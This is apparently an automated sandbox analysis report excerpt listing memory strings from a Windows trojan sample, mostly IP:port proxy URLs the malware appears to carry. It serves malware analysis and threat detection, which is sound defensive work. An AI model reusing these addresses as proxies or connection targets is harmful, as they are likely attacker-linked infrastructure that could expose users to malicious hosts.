                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.205.131:56657
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.205.131:56657://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.205.131:60781
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.205.131:60781://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.205.131:7031
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.205.131:7031://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.213.167:45203
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.213.167:45203://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.226.96:32074
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.226.96:32074://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBEFD000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC0E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.226.96:43328
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBEFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.226.96:43328://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.226.96:46191
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.226.96:46191://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.226.96:4850
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C659E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.226.96:4850://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.226.96:50578
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.226.96:50578://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.226.96:51778
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.226.96:51778://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.226.96:7251
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.226.96:7251://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.244.80:41568
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.169.244.80:41568://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.210.148.89
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.210.148.89://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.210.148.89:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.210.196.222:10800
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.210.196.222:10800://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.210.228.28:15673
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.210.228.28:15673://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.214.193.136:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.214.193.136:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.236.160.186
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.236.160.186://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.236.160.186:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.248.166.13:8888
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.248.166.13:8888://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC635000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC66A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.252.216.81:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC635000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.252.216.81:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.252.220.89:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.252.220.89:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.69.57.1:16099
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.69.57.1:16099://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.69.58.225:16099
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.69.58.225:16099://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.81.128.182:8089
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.81.128.182:8089://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.81.225.9:33140
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.81.225.9:33140://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.95.29.34:54610
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA4C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.95.29.34:54610://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.99.169.19:8444
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.99.169.19:8444://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.99.37.195:33553
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.99.37.195:33553://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.99.37.195:36477
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C78F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.99.37.195:36477://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.99.37.195:49613
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.99.37.195:49613://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.105.62.11:58973
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.105.62.11:58973://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.106.109.195
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.106.109.195://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.106.109.195:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.106.138.52:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.106.138.52:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.107.104.57:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.107.104.57:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C83EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.111.124.108:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C84B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.111.124.108:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.111.124.14:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.111.124.14:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.123.252.70:35973
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.123.252.70:35973://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.123.252.70:35973x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.136.97.17
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.136.97.17://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.136.97.17:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.151.130.114:8086
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.151.130.114:8086://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.151.90.85:16906
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.151.90.85:16906://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.176.242.186
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.176.242.186://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.176.242.186:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.19.255.21:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.19.255.21:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.231.40.182
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.231.40.182://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.231.40.182:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.233.232.120:32650
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.233.232.120:32650://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C924A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.233.232.142:32650
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C924A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.233.232.142:32650://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.239.56.84:8081
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.239.56.84:8081://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAADC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.239.56.84:8081x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.239.58.92:8081
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.239.58.92:8081://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.239.86.247:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.239.86.247:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.239.86.248:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.239.86.248:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.239.86.249:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.239.86.249:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.242.210.140
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.242.210.140://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.253.220.32
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.253.220.32://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.253.220.32:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C902B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.26.158.93:27686
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8E32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.26.158.93:27686://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.29.62.48:25808
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.29.62.48:25808://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.29.62.48:25808x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C76BC000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C76A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.30.13.18:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C76A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.30.13.18:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.31.119.180:55850
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.31.119.180:55850://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.34.237.241:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.34.237.241:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.34.95.110:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.34.95.110:8080://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.41.88.58:53281
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.41.88.58:53281://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.56.255.179:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.56.255.179:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6D0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.56.255.181:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.56.255.181:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.57.139.233:3128
